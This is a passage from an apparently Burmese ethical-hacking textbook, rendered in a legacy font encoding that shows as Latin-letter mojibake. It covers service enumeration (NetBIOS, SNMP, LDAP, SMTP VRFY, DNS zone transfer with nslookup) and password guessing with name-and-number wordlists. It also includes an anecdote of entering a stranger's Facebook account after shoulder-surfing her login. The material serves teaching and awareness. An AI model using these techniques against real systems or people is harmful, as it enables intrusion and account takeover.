Applications
Domain Name System (DNS) onf UDP port 53 rSm
tvkyfvkyfygw,f/ 'gayr,fh 'g[m client query awGtwGufom rSefuefygw,f/
Action rSm TCP port 53 udk awGYjyDqdk&ifawmh Zone transfer jzpfay:aew,f
qdkwmudk od&SdEdkifygw,f/ secure om jzpfraebl;qdk&if zone transfer eJY
ywfoufwJh information rSeforQudk DNS u leak vkyfEdkifygw,f/
client/server model application wpfckonf RPC service eJY TCP 135
ay:rSm rlwnfaeygw,f/ application server eJY csdwfqufxm;wJh client &JU
information awGudk RPC u azmfjyay;Edkifygw,f/ NetBIOS onf tawmf
a&S;usayr,fh null session awGudk toHk;jyKjyD; information awGudk
pkpnf;ay;Edkifygw,f/ MS &JU aemufydkif; version awGrSmawmh file sharing udk
maintain vkyf&mrSm SMB onf NetBIOS uay:uae vkyfaqmifygw,f/
uRefawmfwdkYu monitoring application awGudk toHk;jyKaew,fqdk&if
'g[m SNMP jzpfzdkY rsm;ygw,f/ default community name udk change vdkufwm
vdkrsdK; rSefuefwJh configure jyKvkyfrxm;bl;qdk&ifawmh SNMP onf information
awGudk azmfjyaerSmjzpfygw,f/ Active directory [m operate vkyfzdkYtwGuf
LDAP udk tm;xm;&ygw,f/ default twdkif;&SdaewJh LDAP [m vHkjcHKrI r&Sdygbl;/
LDAP om vHkjcHKrI r&Sd&ifawmh &SdorQ information tm;vHk;udk attacker u
&,loGm;rSmjzpfygw,f/
SMTP server u uRefawmfwdkY&JU ar;cGef;wdkif;udk ajzay;Edkifygw,f/
rSefuefpGm ar;wwfzdkYawmh vdkygw,f/ NTP uawmh machine tm;vHk;&JU tcsdefudk
synchronize vkyfay;Edkifygw,f/ machine name awG tm;vHk;udk extract
vkyfEdkifzdkYtwGufawmh Metasploit code awGudk toHk;jyKEdkifygw,f/
ckaqG;aEG;wmawGu tBurf;zsif; tusOf;csKyfom aqG;aEG;cJhjcif;yg/

NetBIOS
NetBIOS qdkwm Windows 200 & Windows XP wdkYrSm oHk;cJhwJh old
technique wpfckqdkwm uRefawmfwdkY od&SdjyD;ygjyD/ tawmf usefcJhjyDjzpfvdkY
uRefawmfwdkY&JU ,aeY Operating system awGtwGufawmh taxmuftul
rjzpfayr,fh information tcsdKUudkawmh azmfjyaeEdkifqJ jzpfygw,f/

txufygyHkrSm Super Scan udk toHk;jyKjyD; IP address wpfckudk scan

jyxm;ygw,f/ 192.168.10.2 udkyg/ yHkrSm jrifEdkifygw,f/ xdk Super Scan udk
a'gif;,lvdkygu bit.ly/kmn-ap rSm a'gif;,lEdkifygw,f/ .exe zdkiftrsdK;tpm; jzpfjyD;
Windows rSma&m Linux rSmyg run Edkifygw,f/ Kali Linux rSm toHk;jyKvdk&ifawmh
download vdkY & vmwJh SuperScan4.1.exe udk Desktop ay:rSm xm;vdkufyg/
jyD;&if terminal udkzGifhjyD; atmufygtwdkif; &dkufxnfh&HkygyJ/

cd Desktop u vuf&Sd Home directory uae Desktop Directory

xJudk ajymif;0ifvdkufwmjzpfygw,f/ wine qdkwmu windows rSmoHk;wJh exe awGudk
zwfay;EdkifwJh app yg/ SuperScan4.1.exe qdkwmu zGifhr,fh zdkifemrnf jzpfygw,f/

result rSmawmh UDP port 3ck yGifhaewmudk awGY&ygr,f/ UDP banner

grabbing (3 ports) qdkwJh message eJY jyoay;wmjzpfygw,f/ (Windows
application rdkY Windows rSm oHk;wmu ydkjyD; tqifajyygvdrfhr,f/)/
uRefawmfwdkY toHk;jyKr,fh Kali Linux rSm tvm;wl program rsdK;udk
command line (terminal) rSmwif toHk;jyKEdkifygw,f/ toHk;jyK&r,fh tool uawmh
nbtscan jzpfygw,f/
 uReffawfmwdkY odrSwfxm;&rSmu NetBIOS onf ,aeYacwfrSm oHk;wJh
application r[kwfygbl;/ oHk;cJhwm MumjyDjzpfwmaMumifh aemufydkif; OS version
awGeJYawmh udkufnDrI &SdrSmr[kwfbl;qdkwmudkyg/

aemufxyf uRefawmfh Windows 7 IP address wpfckudk Scan

jyxm;wmyg/
 SuperScan rSm Munfh&if Options tab av;awGudk awGY&rSmjzpfygw,f/
tJonfxJu Windows Enumeration qdkwJh Tab udk oGm;vdkufyg/ jyD;&if ay:vmwJh
Hostname/IP/URL qdkwJhae&mrSm rdrd Target &JU Hostname, IP (or) URL awGudk
xnfhoGif;jyD; Enumerate vkyfMunfhEdkifygw,f/ 'Dae&mrSm uRefawmfu 10.0.2.15
(Windows 7 IP address) udk xnfhoGif;vdkufygw,f/

Result awGudk rdrdwdkYbmom prf;oyfMunfhEdkifygw,f/

Clear button udk ESdyfjyD; &SmazGxm;wmawGudk zsufvdkufyg/ jyD;&if

Optionsudk ESdyfyg/
 ay:vmwJh Box rSm Use these credentials qdkwJh tay:qHk; box udk
trSefjcpfvdkufyg/ Account eJY oufqdkifwmawGudk jznfhyg/ uRefawmfuawmh erlem
prf;jyxm;&Hkyg/ training.com rSm &SmazGrSm jzpfygw,f/ Account qdkif&m
tcsuftvufawG jznfhjyD;oGm;wJhtcg OK udk ESdyfjyD; Enumerate jyefvkyfMunfhyg/

ponfjzifh tcsuftvufawGudk awGYjrif&ygvdrfhr,f/

 'Davmufqdk&if uRefawmfwdkYtaeeJY b,fvdkvkyfaqmif&r,fqdkwmudk
qufvuf prf;oyfEdkifjyDvdkY ,lqygw,f/ aemufxyf wpfck qufaqG;aEG;&atmif
cifAs/
SNMP
Information awGudk &SmazGwJhae&mrSm Simple Network Management
Protocol (SNMP) udkvnf; indicator aumif;wpfcktjzpf toHk;jyKEdkifygw,f/
Oyrmajym&&if private string wpfckrSm Cisco device wpfck run aewmudk
odr,fqdk&if device configuration wpfckvHk;udk a'gif;,lxm;EdkifjyD; jyefvnfjyKjyif
jyifqifum udk,fydkif malicious configuration taeeJY upload jyefwifEdkifrSm
jzpfygw,f/
Windows based device wpfckckrSm SNMP eJY configure vkyfxm;&if
patch level, services running, last reboot times, user names, routes eJY
tjcm;aom information awGudk extract &,lEdkifygw,f/ SNMP eJY query
vkyfwJhtcgrSm MIB API udk odxm;zkdY vkdygw,f/ MIB u Management
Information Base udkac:jyD; device udk query vkyfzdkYeJY information awGudk extract
vkyfEdkifzdkY toHk;jyKwmjzpfygw,f/
aemufwpfck owdxm;oifhwmu uRefawmfwdkYtaeeJY toHk;jyKzdkY
rvdktyfwJh Windows component awGudk install rvkyfzdkYyg/ oHk;zdkY vdktyfw,f
qdk&ifawmifrS w&m;0ifcGifhjyKcsuf&,lxm;olu xdk program ay: Access
&,laeEdkifvm;? aemufuG,fuae Backdoor awGudk zefwD;toHk;jyKEdkifrvm; qdkwm
aocsm avhvmoifhygw,f/ Browser rSm extension awG? Plug-in awG
xnfhoGif;oHk;ovdkygyJ/ aocsmpGm ppfaq;MunfhzdkY vdktyfygw,f/ Community
name awGudk default twdkif;roHk;zdkY pwmawGvnf; vkyfaqmifxm;zdkY
vdktyfygvdrfhr,f/
vdktyfcsuft& SNMP udk enable vkyfxm;&ygu event logs awGudk
monitor vkyfaezdkYeJY traps awGudk collect vkyfxm;zdkY pwmawG vkyfaqmifxm;zdkY
vdktyfygw,f/

LDAP
LDAP (Lightweight Directory Access Protocol) ukd tjcm;aom
services awGrS (odkYr[kwf) active directory xJrSmyJ pkpnf;xm;wJh directory awGudk
access &,lEdkifzdkYtwGuf toHk;jyKavh&Sdygw,f/ directory awG[m Organization
wpfck&JU Structure vdk wnf&SdaewwfjyD; quick lookup eJY fast resolution
vkyfEdkifzdkYtwGuf DNS eJY wGJxm;avh&Sdygw,f/ omreftwdkif;qdk directory
awGonf port 389 rSm run ygw,f/
User profile (e.g. user name, passwords, ..) udkom oifhtaeeJY access
&&Sdxm;w,fqdk&ifawmh LDAP enumeration vkyfaqmif&wm vG,fulEdifygw,f/
tJvdkvkyfzdkYtwGufawmh Administrator Account vdkrsdK; high privilege
awG&&SdaewJh account awmif rvdktyfygbl;/ target domain xJrSm omref account
wpfckck &Sd&HkeJYwif tqifajyygw,f/
'gudk vkyfaqmifMunfhzdkYtwGuf Softerra udk toHk;jyKMunfh&atmif/
(LDAP hack (or) LDAP enumerate vkyfaqmifzdkYtwGufawmh tool awGu
rrsm;bl;cifAs/)

(,ckpmtkyfyg tool rsm; (applications) udk bit.ly-kmn-app wGif update

taeeJY tjrJwrf; &,lEdkifrSmjzpfygw,f/) ck txufygyHkrSm toHk;jyKxm;wmuawmh
Softerra &JU LDAP Administrator 2017 jzpfygw,f/ install jyD; zGifhwJhtcg
txufygtwdkif; jrif&ygr,f/ Windows rSm toHk;jyKjywm jzpfygw,f/
yHkxJutwdkif;yJ server udkESdyfjyD; New Profile a&G;cs,fvdkufyg/
Profile Name wpfck ay;jyD; Next eJY qufoGm;wJhtcg atmufyg
yHktwdkif; jrif&ygr,f/ Host ae&mrSm Host &JU IP address udk jznfhoGif;EdkifjyD; port
uawmh 389 rSm run w,fvdkY aqG;aEG;xm;jyD;jzpfygw,f/
 Host ae&mrSm Target IP udk xnfhoGif;jyD; Base DN rSm
DC=Training,DC=com vdkY jznfhoGif;vdkufygw,f/ Training.com server udk scan
rSmrdkYyg/ jyD;awmh next vdkufygw,f/

wwd,tqifhtjzpf txufygyHktwdkif; jrif&ygr,f/ uRefawmfwdkYrSm

a&G;cs,fp&mawG &Sdygw,f/ tu,fíaygh/ target server rSm uRefawmfwdkYtaeeJY
omref account wpfckavmuf &Sdrxm;bl;qdk&ifawmh Anonymous user tjzpf
vkyfaqmifEdkifygw,f/ 'Dae&mrSmawmh uRefawmfu omref (bm privilege rS r&SdwJh
account) wpfckeJY erlem jyygr,f/ test@training.com eJYaygh/
user & passwords udk rSefatmif xnfhjyD;&if 'DvdkyHktwdkif; jrif&ygr,f/

Next vdkufvdkY &ygjyD/

Binding vkyfaewmudk jrifawGY&rSmjzpfygw,f/

 CN=Users qdkwJhxJrSm user awGeJY oufqdkifwmawGudk uRefawmfwdkY
jrifawGY&rSmyg/

'Dvkyfaqmifcsufudk vkyfaqmifEdkifzdkYtwGuf omref account wpfckom

vkdtyfygw,f/ Account vHk;0 &Sdrxm;bl;qdk&ifvnf; jzpfygw,f/ 'gayr,fh
account &Sdxm;wmuawmh ydkjyD; aumif;rGefwJhtcsuftvufawG ydkrdk &&SdaprSmyg/

NTP
uRefawmfwdkYawG tawmfrsm;rsm; odjyD;jzpfwJh protocol wpfckyg/ Network
Time Protocol vdkY ac:ygw,f/ network computer awG&JU clock awGudk
synchronize vkyfEdkifzdkYtwGuf xkwfxm;wmygyJ/ vulnerability analysis (or)
penetration testing jyKvkyfr,fqdk&if NTP server udk query vkyfjyD; &vmr,fh data
awGu wefzdk;&SdjyD;awmh rnfonfh authentication rQ rvdktyfwmaMumifh
'Day:rSmvnf; tav;xm; jyKvkyfavh&SdMuygw,f/
SMTP
Simple Mail Transport Protocol (SMTP) onf uGefysLwm pwif
ay:aygufp umv0ef;usifuwnf;u pwifcJhwm jzpfygw,f/ emrnfeJYvdkufatmif
vnf; SMTP onf &dk;&Sif;ygw,f/ email message awG ay;ydkY&m vufcH&mrSm
POP3 or IMAP udk toHk;jyKwJh SMTP udk toHk;jyKrI rsm;ygw,f/ omreftm;jzifh
SMTP onf port 25 rSm run avh&SdjyD; Mail Exchange (MX) server ay:rSm
rSDwnfaeygw,f/

toHk;jyKrsm;wJh command wpfckjzpfwJh VRFY udkawmh apt install vrfy eJY

tvG,fwul oGif;,l&&SdrSmjzpfjyD; user awGudk validate vkyf&mrSm
toHk;jyKEdkifygw,f/

olYudk toHk;jyK&r,fh yHkpHu txufygtwdkif;jzpfjyD; options ae&mrSm

oHk;Edkifr,fh options awGudkyg azmfjyay;xm;wm awGY&ygr,f/ wpfckcsif;pDudk
tao;pdwf Munfhcsif&ifawmh man vrfy eJY ac:MunfhEdkifygw,f/

DNS Enumeration
DNS Enumeration qdkwmuawmh organization wpfcktwGuf olwdkY&JU
DNS server awGeJY oufqdkif&m qufpyf rSwfwrf;awGtm;vHk;udk nTefjyay;wJh
jzpfpOfvdkY ajymvdkY&ygw,f/ Company (or) Organization wpfckrSm user names,
computer names, IP address pwJh tcsuftvufawGudk rSwfwrf;jyK
odkavSmifxm;Edkifr,fh internal and external DNS servver awG &SdwwfMuygw,f/
DNS Enumeration vkyfaqmif&mrSm toHk;jyKEdkifwJh tool (or) program awGuawmh
NSlookup, DNSstuff, the American Registory for Internet Numbers (ARIN) eJY
WHOIS wdkY jzpfMuygw,f/
xdktxJrSm powerful vnf;jzpf oHk;&wmvnf; vG,fwmuawmh
NSlookup jzpfygw,f/ Windows, Linux & Unix awGrSm yg0ifjyD;om;jzpfvdkY
windows cmd uaejzpfap Linux terminal uae jzpfap wdkuf&dkuf toHk;jyKEdkifrSm
jzpfygw,f/ server & other host awGtwGuf additional IP address awGudk
&SmazG&mrSm NSlookup udk toHk;jyKEdkifygw,f/ whois.net , whois.com/whois eJY
who.is wdkYrSmvnf; oGm;a&mufMunfh&IEdkifaMumif; a&SUrSm uRefawmfwdkY aqG;aEG;cJhMu
jyD;ygjyD/ ckawmh NSlookup udk Windows rSm tenf;i,f xyfvkyfMunfh&atmifyg/
a&SUrSmawmh Kali Linux Terminal rSm toHk;jyKwJhtaMumif; azmfjyaqG;aEG;cJhjyD;jyDrdkY
yg/ windows cmd rSmjzpfap terminal rSmjzpfap twlwlyJrdkY tajymif;tvJ
jzpfoGm;atmif Windows rSm vkyfaqmifjyjcif;om/

txufygyHkt& cmd udk zGifhjyD; nslookup vdkY &dkufxnfhvdkufygw,f/

vuf&Sd uRefawmf oHk;aewJh default server address udk 192.168.10.2 vdkY
jyaeygw,f/

Linux terminalrSm &dkufMunfhr,fqdk&ifawmh rdrdwdkY&JU IP address udk

jrif&rSmr[kwfyg/ 'gav;wpfckyJ uGmjcm;ygw,f/

yxr wpfaMumif;rSm set type=any vdkY ay;vdkufygw,f/ oabmu

rnfonfh yHkpHudkrqdk &,lr,f qdkwJh oabmaygh/ 'kwd,aMumif;rSm ls -d eJY server
udk -d (dump) jyKvkyfvdkufygw,f/ aemufrSmawmh uRefawmfwdkY&JU target domain
udk xnfhoGif;vdkufygw,f/

Linux terminal rSmawmh 'kwd,aMumif;rSm ls -d xnfhp&mrvdkygbl;/

domain udk wdkuf&dkuf &dkufxnfhEdkifygw,f/ rdrdwdkY&JU network access &&Sdxm;rIay:
rlwnfjyD; windows rSmvnf; ls -d eJY 0ifr&wm &Sdygvdrfhr,f/ zone transfer
aMumifhyg/
 bmawG &vmrvJqdkwmudkawmh rdrdwdkYbmom prf;vkyfMunfhygcifAs/
NSlookup eJY ywfoufjyD; a&SUrSmvnf; aqG;aEG;cJhjyD;jyDrdkYvdkY 'DavmufeJYyJ
&yfem;yg&apcifAsm/ aemufxyf CHAPTER wpfckrSm System hacking tydkif;
Windows taMumif;udk qufjyD; aqG;aEG;&atmifyg/
CHAPTER 17: System Hacking - Windows

Introduction

'D CHAPTR u System Hacking qdkayr,fh Windows system udkom

t"du aqG;aEG;oGm;rSmjzpfaMumif;awmh BudKwif azmfjyxm;yg&apcifAsm/ ,aeYxd
uGefysLwmawGrSm trsm;qHk; toHk;jyKMuwmu Windos OS awGom
jzpfygMuygw,f/ Mac awGudk oHk;&ifawmifrS Windows wifjyD; oHk;Muwmom
rsm;wmudkvnf; awGYjrif&rSmjzpfygw,f/ uRefawmfwdkY EdkifiHrSm &Hk;wdkif;vdkvdku
Windows OS udk oHk;aeMuw,f qdkwm tm;vHk; odjyD;om; jzpfvdkY System hacking
udk bmvdkY Windows udk focus xm;&vJqdkwm &Sif;jyp&m rvdkavmufawmhbl;
xifygw,f/

Password Attacks
t"dutm;jzifh Password Attack ESpfrsdK; &Sdygw,f/ Social & Digital
attacks yg/ Social attack rSm attacker u victim &JU password udk cefYrSef;EdkifzdkY
twGuf Shoulder surfing (ykcHk;ay:rS ausmfMunfhjcif;^wpfae&m&muae
Munfhaejcif;) enf;vrf;? dumpster diving (trdIufyHk;xJuae aumif;wmawG
jyef&Smxkwfjcif;^ xifrSwfrxm;onfh ae&mrsm;rS roHk;awmhonfh zkdifrsm;xJrS
&SmazGjcif;) enf;vrf; ESifh SE (Social Engineering) enf;vrf;wdkYudk
toHk;jyKMuygw,f/
'Dae&mrSm pm&IoltaeeJY ]]shoulder surfing u Social Engineering
wpfrsdK;yJ r[kwfvm;}} vdkY ar;aumif; ar;Edkifygw,f/ tJonftwGufawmh
r[kwfygbl; vdkYyJ ajz&ygr,f/ bmvdkYvJqdkawmh yxrtcsuf - uRefawmfwdkYtaeeJY
&Hk; (odkY) ukrÜPDwpfcktwGif; taMumif;wpfpHkwpf&maMumifh 0ifa&mufEdkifwmrsdK;
&SdEdkifygw,f/ xdktcgrSmvnf;yJ uRefawmfwdkYtaeeJY Victim udk MunfhjrifEdkifjyD;
&efukefrSm&SdwJh vdkif;um;awGay:rSmjzpfap? wifi free ay;xm;aom ae&mawGrSm
jzpfap shoulder surfing udk toHk;jyKEdkifygw,f/ 'gayr,fh uRefawmfwdkY
odrSwfxm;&rSmu Shoulder surfing onf usdef;aoayguf Password &Edkifr,fh
enf;vrf; vdkY owfrSwfrxm;zdkY jzpfygw,f/ bmaMumifhvJqdkawmh uRefawmfwdkY
MunfhaewJhtcsdefrSm victim u Login jyKvkyfcsifrS jyKvkyfrSmrdkYygyJ/
Oyrm - uRefawmfwdkYu um;pD;&if; Facebook oHk;aerdwm
jzpfcsifjzpfygr,f/ Log out vkyfrxm;wJhtwGuf Login vkyfp&mrvdkbJ
oHk;&rSmjzpfvdkY wpfa,mufa,mufu MunfhaecJh&ifawmif uRefawmfwdkY account udk
rSwfxm;&HkuvGJvdkY bmrS wwfEdkifrSm r[kwfygbl;/ rsm;aomtm;jzifhu Facebook
oHk;ol trsm;pkonf wpfBudrfom Login 0ifxm;avh&SdjyD; jyefxGufavhr&SdMuvdkY
jzpfygw,f/ &Hk;wGif;rSmvnf; xdkYtwlygyJ/ rdrd twGif;a&mufvdkY
Munfh&IEdkifw,fqdkOD;awmh rdrda&mufwJhtcsdefrSm uGefysLwmu zGifhjyD;om;udk
oHk;aewmvnf; jzpfaumif;jzpfygvdrfhr,f/ 'gaMumifh usdef;ao &r,fvdkY rajymEdkif
wJh enf;yg/
'gayr,fh tvsOfoifhvdkY uRefawmfhtaeeJY BuHKcJh&wmav; jyefvnf
ajymjyyg&ap/ &efukefrSm vdkif;um;pD;&if;yJ Facebook Account wpfckudk Login
0ifaewJh rdef;uav;wpfa,mufudk awGYvdkuf&ygw,f/ Password awGudk
rjrif&bl;qdkayr,fh uRefawmfwdkYawG aeYpOfoHk;ae&wJh Keyboard vufuGufrSm
b,fcvkwfudk ESdyfvdkuf&if bmjzpfr,fqdkwm odaewmaMumifh xdk account
av;xJudk uRefawmf 0ifMunfhEdkifcJhjyD; aemufudk rdrdwpfa,mufwnf;
r[kwfwJhtcsdef Login r0ifzdkYtaMumif;? Login Approval xm;jyD;
oHk;oifhwJhtaMumif; Only Me post wpfck wifxm;cJhay;jyD; jyefxGufcJhvdkufygw,f/
aemuf wpfcgu ydkjyD; ta&;BuD;ygw,f/ 'DaeYacwfrSmu Mobile
Banking awG iBanking awGudk wGifus,fpGm toHk;jyKvmwmaMumifh ydkjyD;
aumif;vmwmawG &Sdovdk owdxm;&rSmawGvnf; ydkjyD; rsm;vmygw,f/ bPfawG
uvnf; bPfwpfckeJYwpfck toHk;jyKwJhenf;vrf;awG uGJjym;wm awGY&ygw,f/
Mobile Banking awGxJrSmawmh CB Bank &JU Mobile Banking av;udk ydk
oabmusrdygw,f/ Pass code udk odoGm;&ifawmif vdkufzGifhvdkY r&vdkYyg/ olU&JU
tm;enf;csufuawmh zkef;ajymif;wJhtcgjzpfap software ysufoGm;vdkY
jyefxnfhwJhtcgjzpfap bPfudk jyefoGm;&wmav;wpfckygyJ/
usefwJh Bank awGxJrSm Aya eJY KBZ wdkYyJ uRefawmfoHk;zl;vdkY Oyrmav;
ajymjyygr,f/ Login rSm User ae&mawGudk formula eJY xm;wmjzpfvdkY rSwfzdkY
vG,fygw,f/ (b,fvdk xm;vJqdkwmawmh rajymawmhygbl;/ oHk;zl;olawG tvG,f
odEdkifygw,f/)/ Mail wpfckudk login 0ifovdk user eJY password udkom od&if
b,folrqdk tvG,fwul 0ifvdkY &ygw,f/ uRefawmfawGYzl;wJh
wpfpHkwpfa,mufuawmh um;ay:rSm vltrsm;BuD;Mum;rSmu Mobile Banking
zGifhjyD; aiGppfwmyg/ user name eJY password u rSwf&vG,fvGef;vdkY
oHk;av;vxdawmif rSwfrdaewkef;yg/ olY Account xJrSm olYbmom ppfaewkef;
uRefawmfjrifvdkuf&wmawmh odef; 20 ausmf &Sdygw,f/ (wpfa,mufa,mufursm;
jrifjyD; tjcm; account wpfckckxJ vTJvdkuf&if .......)
uRefawmfwdkYawGu enf;ynmawG wdk;wufvmwmawGudk toHk;csaeMu
vdkufoHk;aeMuayr,fh security udk tav;xm;zdkY arhaewwfMuygw,f/
qufjyD;aqG;aeG;&atmifyg/ tay:rSm uRefawmf aqG;aEG;cJhwJh shoulder surfing u
b,fae&mrSmrS toHk;r0ifbl;vdkY xifrSm pdk;vdkY erlem azmfjyjcif;om jzpfjyD;
rdrdwdkYtwGufvnf; aqmif&efa&Smif&efav;awGudk rSwfxm;oifhygw,f/ ('Denf;vrf;
eJY tcsdKUaom Facebook Page admin awG&JU ayghavsmhrIaMumifh Account ygjyD;
Page odrf;cHvdkuf&w,f qdkwmawGvnf; Mum;zl;aygif; rsm;vSygjyD)/
tcsdKUu user name & password vdk ta&;ygwmawGudk note xJrSm
rSwfavh &SdMuygw,f/ xdk note awGonf pmtkyfrSmvnf; jzpfEdkifovdk zkef;xJu
note vnf; jzpfEdkifygw,f/ uGefysLwmrSmawmh Stick note rSm rSwfavh&SdolawGvnf;
awGYzl;ygw,f/ dumpster diving uawmh tJ'gawGxJuaevnf; &SmazGwmygyJ/
Hacker wpfa,mufonf uRefawmfwdkY&JU &Hk;xJudk b,fvdk
a&muf&SdvmEdkifrvJ awG;Munfh&atmif/ yxrtcsuf - olonf &Hk;xJu
(ukrÜPDxJu) wpfa,mufa,mufeJY friend jzpfaewmvnf; jzpfEdkifovdk ,m,D
taeeJY 0efxrf;tjzpf tvkyfvmvkyfaewmvnf; jzpfEdkifygw,f/ tcsdKUaom
hacker awGonf olwdkY vkyfaqmifr,fh vkyfief;&JU tBuD;tao;ay: rlwnfjyD;awmh
individual information awG &zdkY vawGeJYcsDjyD;awmif apmifhqdkif; vkyfaqmifavh
&SdMuygw,f/ (hacker qdkwm ZGJvnf; tvGefaumif;wJholawG jzpfMuygw,f)
uRefawmf azmfjycJhwmu v awGeJY csDjyD; vdkYaemf v vnf;r[kwfovdk
ESpfawGeJYvnf; rcsDygbl;/ (tvGefqHk; wpfESpfavmufxdaygh) :)
tjcm;aom EdkifiHawGrSmawmh company xJudk cyfwnfwnf
0ifvmjyD;awmh Internal Penetration Testing vkyfzdkY w&m;0ifiSm;&rf;xm;aMumif;
pm&Gufpmwrf; twkawGeJYtwl (wm0ef&Sdol tBuD;tuJawG r&SdwJh^jyefvmzdkY
cufwJh tcsdefawGrSm) oGm;a&mufjyD; vdkcsifwJh tcsuftvufawG &atmif
vkyfwmrsdK; vkyfaqmifMuavh &Sdygw,f/ 'DrSmawmh tJvdk vkyfzdkY rvG,fygbl; As/
Social Attack jyD;awmh aemufwpfcku Digital Attack yg/ Digital
Attack udkawmh Key loggers, Password guessing, password cracking, brute
force attacks eJY rainbow tables awGudk toHk;jyKjcif; pwJh enf;vrf;awGeJY
vkyfaqmifEdkifygw,f/ wpfckcsif;pDtaMumif;udk oifhawmf&mae&mawGrSm xnfhoGif;
aqG;aEG;oGm;ygr,f/

Password Guessing

'Dacgif;pOfudkawGYawmh pm&IoltaeeJY jyHK;csif jyHK;rdrSmyg/ Password

Guessing qdkwm Hacking xJrSm &,fp&maumif;wJh tydkif;wpfckvdkY xifjrifrdcsif
xifjrifrdrSmyg/ 'gayr,fh uRefawmfwdkY&JU vufawGY b0rSmawmh Password
Guessing u tawmfhudk ta&;ygwJhae&mrSm &Sdaewmudk awGY&ygw,f/ Password
Guessing udk xdxda&mufa&muf vkyfaqmifEdkifzdkYtwGUfawmh rdrd target xm;wJh
victim &JU tcsuftvufawGay: rlwnfpOf;pm;&rSm jzpfygw,f/ 'Dvdk
vkyfaqmif&mrSm Password Guessing Tool awGudkvnf; toHk;jyKEdkifygw,f/
Password Guessing qdkwm rdrd target &JU Password udk cefYrSef;jcif;
jzpfvdkY yHkaoenf; qdkwmawmh &SdrSmr[kwfygbl;/ 'gayr,fh pOf;pm;p&mtcsufawG
awmh &Sdaeygw,f/ uRefawmfwdkY&JU target company (or) target organization rSm
tcsdKUaom tcsufawG[m owdrrlrdbJ toHk;jyKaerdwwfwm jzpfaeEdkifygw,f/
'gaMumifh wpfcsufcsif;pDudkyJ aqG;aEG;oGm;yg&ap/
1/ uRefawmfwdkYawGonf Password owfrSwf&mrSm yxrqHk;
pOf;pm;wmu uRefawmfwdkY rSwfrdzdkYyg/ (tJvdkrS r[kwf&if udk,fhbmom arhjyD;
tqifajyrSm r[kwfygbl;)/ tJ'Dawmh uRefawmfhwdkY rSwfrdr,fh t&mawGudkom
password tjzpf toHk;jyKavh&SdMuygw,f/
2/ uRefawmfwdkYawGrSm security knowledge &SdwJholawGuawmh Secure
jzpfzdkYvnf; pOf;pm;&ygw,f/ (tcsuf 1 twdkif; rSwfrdzdkY&,f? tcsuf 2 twdkif;
vHkjcHKrI&SdzdkY&,faygh)/ 'gayr,fh vltrsm;pktwGufuawmh eHygwf wpftcsufudkyJ
t"du xm;avh&SdMuygw,f/
txufyg tcsuf ESpfcsufrSm awG;p&m cefYrSef;p&mawG jzpfay:oGm;wm
jzpfygw,f/ 'gayr,fh tajccH awG;awmEdkifwJh password guessing enf;vrf;rSm
wpfEdkifiHeJY wpfEdkifiH ,Ofaus;rIt&? aexdkifrI pepft& pum;vHk;awG awmh
uGmjcm;csif uGmjcm;Edkifygw,f/
eHygwfwpf tcsufudk yxrqHk; aqG;aEG;&atmifyg/ uRefawmfwdkYawGonf
uRefawmfwdkYudk,fwdkif rSwfrdr,fh password rsdK;udkyJ pOf;pm;avh&SdMuygw,f/
'Dtcsufu aqG;aEG;&&if us,fjyefYygw,f/ 'ghjyif wpfa,mufeJY wpfa,muf
owfrSwf cH,lyHkcsif;vnf; rwlygbl;/ 'gaMumifh Password Guessing udk
vkyfawmhr,fqdk&if yxrqHk; uRefawmfwdkY odrSwfxm;&rSmawGu emrnfawG
jzpfygw,f/
vltrsm;pkonf name password udk toHk;jyKMuavh&Sdygw,f/ 'gu
odyfjyD; &dk;pif;w,fvdkY xifaumif;xifygr,f/ 'gayr,fh uRefawmfwdkYawG emrnfudk
trSefwu,f oHk;Muygw,f/ emrnfoufoufxuf udef;uav;awGeJY wGJjyD;
owfrSwfwmrsdK;yg/ olYudk format uav;eJY ajym&if 'Dvdkyg/ "Name+Number"
Oyrmajym&&ifawmh khitminnyo123 aygh/ (uRefawmfhemrnfeJY Oyrmay;xm;vdkY
yg)/ udef;awGae&mrSmawmh rdrdwdkYoHk;wJh zkef;eHygwf&JU aemufqHk;*Pef;awG vnf;
jzpfaeEdkifovdk rdrdwdkY&JU arG;aeYawGudk xnfhoGif;xm;wm vnf; jzpfEdkifygw,f/
Oyrm uRefawmfawGYzl;wJh Password uav;awGudk ajym&&if
Name+Number rSm emrnfu atmifatmif? zkef;eHygwfu 09 123 456 789?
rSwfyHkwif eHygwfu 062612 ? arG;aeYu January 4, 1990 qdkMuygpdkY/
Name+Number yHkpHeJY pOf;pm;&if olY&JU jzpfEdkifacs &SdwJh password onf
atmufygtwdkif;xJu jzpfygr,f/
aungaung123
aungaung12345
aungaung789
aungaung123456789
agag123456789 (Ph.No.)
AgAg123456789
aungaung062612
aungaung4190 (4.1.1990)
aungaungjanuary4
ponfjzifhyg/ txufygtwdkif;omvdkY rrSwf,lapcsifygbl;/ Guessing
onf onfhxufydkjyD; tao;pdwfygao;w,f/ Oyrm - emrnfae&mrSm victim &JU
emrnft&if; r[kwfbJeJY nick name or company/organization name vnf;
jzpfaeEdkifwmyg/ ajymifac:wJhemrnf awGvnf; jzpfaeEdkifao;ovdk ywfouf&m
ywfoufaMumif; emrnfawGvnf; jzpfaewwfygao;w,f/ tdrfarG;wd&pämeftrnf?
cspfcif&oltrnf ponfjzifhaygh/ 'ghjyif arG;&yfajrudkvnf; password name tjzpf
oHk;avh&SdwwfMuygao;w,f/ 'guawmh enf;ygw,f/ jcHKajym&&if
uRefawmfwdkYonf password xm;wJhtcg rSwfrdvG,fapzdkYtwGuf Name+Number
format eJY xm;avh&SdMuygw,f/
'kwd,uawmh Name+Security yHkpHyg/ Security t& *#$@! pwJh
Special Character awGudk oHk;oifhw,fvdkY ,lqwJh tay:rSmaqG;aEG;cJhwJh tcsuf 2
u olawGuawmh *#@ pwJh oauFwawGudk oHk;avh&SdMuygw,f/ txufyg
atmifatmifeJYyJ Oyrmay;&&ifawmh
aungaung*124#
@#$aungaung$#@
aungaung*#4190
aungaung@123456789 (Phone number)
ponfjzifh jzpfygw,f/ 'gawGu uRefawmfwdkYtaeeJY pOf;pm;oifhwJh
password yHkpH erlemav;awGyg/ uPef;jyD;rS emrnfudk xnfhwJh Name+Number &
Number+Name awGvnf; oHk;wJholawG &SdrSmyg/
aemufwpfcku uRefawmfwdkYawGonf Password xm;wJhtcg zkef;eHygwf
udk password tjzpf xm;avh&SdMuygw,f/ Oyrm - 09 123 456 789 , +959 123
456 789 ponfjzifhaygh/ 123456789 ae&mrSmawmh uRefawmfwdkY&JU zkef;eHygwfaygh/
